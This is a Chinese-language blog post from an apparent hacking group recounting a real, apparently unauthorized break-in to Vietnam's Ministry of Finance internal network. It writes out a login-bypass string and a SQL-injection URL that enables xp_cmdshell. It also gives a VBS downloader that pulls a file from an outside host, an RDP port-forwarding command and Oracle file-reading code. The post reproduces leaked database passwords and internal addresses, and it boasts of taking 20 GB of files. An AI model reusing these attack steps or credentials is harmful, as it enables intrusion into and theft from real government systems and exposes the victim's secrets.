首页 > 暗组技术 > 进入越南财政部内网部分细节
2019
07-05

进入越南财政部内网部分细节

title: 进入越南财政部内网部分细节
tags: 内网渗透,海外渗透,习科

grammar_cjkRuby: true

enter description here

Ping www.mof.gov.vn → 118.70.204.144

这种都到部委级别的站了,估计整个第4段ip全是它的。用iknock扫一下同C的ip段

enter description here

于是先拿临近ip下手,也是财政部的机器,主站是144,看到有个存活的154的机器。

Ping msns.mof.gov.vn → 118.70.204.154

临近ip开放常用端口的机器不多,这个154居然用万能密码上去了,不知道什么的后台,但是从aspx中可以判断是台windows,拿来当跳板再好不过了。

http://msns.mof.gov.vn/hagiang/login.aspx
http://msns.mof.gov.vn/hagiang/adminlogin.aspx
万能密码'or'1'='1
后来添加的账号和密码silic1/silic1

enter description here

添加信息看不懂。。。。上传上去下载方式不是物理路径,是变量形式的。
(一开始上去不是最高权限的账户,后来习科的大牛又提权的。。。后台提权。方法未知)

从添加和编辑的页面没有找到突破点(主要看不懂啊),换个思路,点开右上角编辑个人资料页面,发现一个SA的注入点!

具体怎么研究的这个注入点,先来看一个语句
http://msns.mof.gov.vn/hagiang/iframe.aspx?page=account_edit&mode=edit&id=42+union+all+select+1,null,null,4,null,null,7,8,9,null,1,2,null,null,null,6,null,null,9,0,1,2,3;EXEC+sp_configure'show advanced options',1;RECONFIGURE;EXEC+sp_configure'xp_cmdshell',1;RECONFIGURE;select+1

第一步union出字段以后,发现表太多,支持多语句查询。但是执行exec xp_cmdshell发现报错。

多语句查询,SA权限,直接从注入点解禁xp_cmdshell,执行命令。
然后就开始各种exec_xpcmdshell执行命令。

分别ping和ipconfig了一下,发现ping不通外网,网关限制了。

Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::7:b9c1:37ee:f06b%11
IPv4 Address. . . . . . . . . . . : 10.192.246.45
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.192.246.1

这台机器属于纯内网,通过网关开放80端口出来,从实际效果而言,除了80端口,其他任何端口都出不来外网,跟没联网差不多。
不管怎么样,先写上webshell再说吧,毕竟只开放80端口。

路径猜不到,靠工具跑盲注点太慢了。于是干脆执行echo命令写个读iis配置的vbs文件上去:

echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://silic.wiki/iis.vbs^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"C:\c:\windows\temp\iis.vbs^",2 >c:\windows\temp\a.vbs

特殊字符需要前面加个^转义,可以本地自己echo测试

尝试着echo写一个下载文件的vbs脚本到系统。然后发现cscript执行这个echo的vbs不能成功下载(本地测试成功),看来果然是出不去,只好把读取iis配置的vbs也echo上去了(很长很长很长很长)

总之最后是把webshell写上去了

enter description here


这种除了80端口其他完全弹不出来的情况,上远控主机也无法上线。。还是研究怎么把3389转发出来吧。
reduh上去以后提示失败。。。于是核心群的大神找了一个神工具,原理和reduh一样,但是在此次渗透中,更实用+更稳定

D:\proxy\proxy.py -u http://msns.mof.gov.vn/hagiang/conn.aspx -l 1234 -r 3389 -v

通过MSSQL的xp_cmdshell添加了用户后成功登陆。

enter description here

这台机器无法联网,DNS都解析不出来,传工具只能用webshell,每次只能传1MB左右的文件(速度还非常慢。。)
先看一下传上去的工具。。

enter description here
enter description here

目前还只用到这些,后期还会传nmap+wincap、Wireshark之类的,简直酸爽的不要不要的
读取了管理员的RDP记录,发现管理员没在服务器上登陆过别的机器的3389或者SSH,用iKnock扫了下内网,其中10.192.0.x这个ip段下只有一台Oracle主机存活,而10.192.246.45所在的ip段有多台主机存活

管理员登陆记录是很久以前的,所以wce并没有读到明文密码,对其他机器自然也有太好的直接下手的办法。

读取网站的web.config配置文件,发现的一些关键信息如下:

<connectionStrings>
        <add name="CAPMASO" connectionString="Data Source=localhost;Initial Catalog=DVHCC_CAPMASO;User ID=sa;Password=dvctt@123" providerName="System.Data.SqlClient" />
        <add name="DMDC_constr" connectionString="Data Source=(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=10.192.0.23)(PORT=1521)))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=DNS)));User ID=dns;Password=dn$2o12;" />
        <add name="DNS_constr" connectionString="Data Source=(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=10.192.0.23)(PORT=1521)))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=DNS)));User ID=dns;Password=dn$2o12;" />
</connectionStrings>
<appSettings>
        <add key="AppTitle" value="D?ch v? c?ng tr?c tuy?n" />
        <add key="SoTaiChinhID" value="23" />
        <add key="DMDC" value="oracle" />
        <add key="IDTepTK" value="41832" />
        <add key="IDTepTK_XDCB" value="42521" />
        <add key="ServicesURL" value="http://10.192.246.45:8888/DNSWS/DNSServiceSoapHttpPort" />
        <add key="AppURL" value="http://msns.mof.gov.vn/" />
        <add key="KichHoatQuaEmail" value="0" />
        <add key="DiaBanID" value="12"/>
        <add key="CQTC_MA" value="1202"/>
        <add key="KhoBacCapTren" value="3449"/>
</appSettings>

有MSSQL的配置信息,有Oracle的配置信息。

enter description here

关于MSSQL,库中的表都是越南语或者简写命名,太不好分辨哪些有价值哪些没价值了,所以直接用习科的MSSQL脱库工具,一键全脱,然后以关键字筛选后下载。

至于Oracle,找了很多工具,最后推荐一个精简不需要sqlplus的工具www.sqltools.net
我们选择的是这个版本: 03.10.2011 SQLTools 1.5 RC1 build 22 (Zip) 1.12M

因为本机没有撞Oracle环境,这是连接串的设置,要在TNS那里选择Bypass tnsname.ora,并且勾上Use Service instead of sid

enter description here

先试着用Oracle读文件试试吧

--查看当前的目录环境
SELECT * FROM dba_directories
--设置目录
create or replace directory FILENAME as 'C:\';
--创建写入内容的表
CREATE TABLE TEST(a VARCHAR2(4000),b VARCHAR2(4000));
--读取文件
DECLARE
  filehandle utl_file.file_type;
  filebuffer varchar(200);
   BEGIN
     filehandle := utl_file.fopen('FILENAME','boot.ini','r');
    loop
      begin
           utl_file.get_line(filehandle,filebuffer);
           INSERT INTO TEST(a) VALUES(filebuffer);
           EXCEPTION 
             WHEN no_data_found THEN 
             exit ; 
       End;
      END LOOP;
    utl_file.fclose(filehandle);
COMMIT;
END;

读取文本提示失败,但是写入文件似乎是成功了。

enter description here

目前对于这台服务器的思路就是写入启动项一个bat,管理员重启机器的时候添加administrators的用户。。。但是这种时效性太差。
这期间nmap分为25个RAR包依次上传完毕,正好启动nmap扫一下10.192.0.23这台机器的端口

C:\Users\iis_user\Desktop\tools>nmap -p- 10.192.0.23

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2015-06-06 13:53 SE Asia Standard Time

Nmap scan report for 10.192.0.23 Host is up (0.0019s latency). Not shown: 999 filtered ports PORT STATE SERVICE 1521/tcp open oracle

Nmap done: 1 IP address (1 host up) scanned in 6.09 seconds

就在下一步一筹莫展的时候,从网络共享中发现了进一步的突破

\Elearnapp2\e\Elearning\BackUp\Web
<add key="solrUrl" value="http://10.192.246.34:8983/solr" />
<add key="webrootpath" value="\\10.192.246.33\e\Elearning\Web" />
<add key="chatdomain" value="http://dtttmedia.mof.gov.vn/html/hello.html" />
<add key="learningComponentsConnnectionString" value="Server=10.192.0.31;Database=elearning_scorm;uid=sa;pwd=abcd@1234;" />
<add key="pathLiveWebinar" value="C:\Program Files\Red5\webapps\livewebinar\streams" />

web.config文件中一些关键配置。其中10.192.0.31没有开放1433,但是机器存活。

enter description here

配置中的dtttmedia.mof.gov.vn/html/hello.html页面存在。

enter description here

因为所涉及太广,下了内网20G的文件,有机会会将所有笔记和文件发出来下载链接的


本文》有 0 条评论

留下一个回复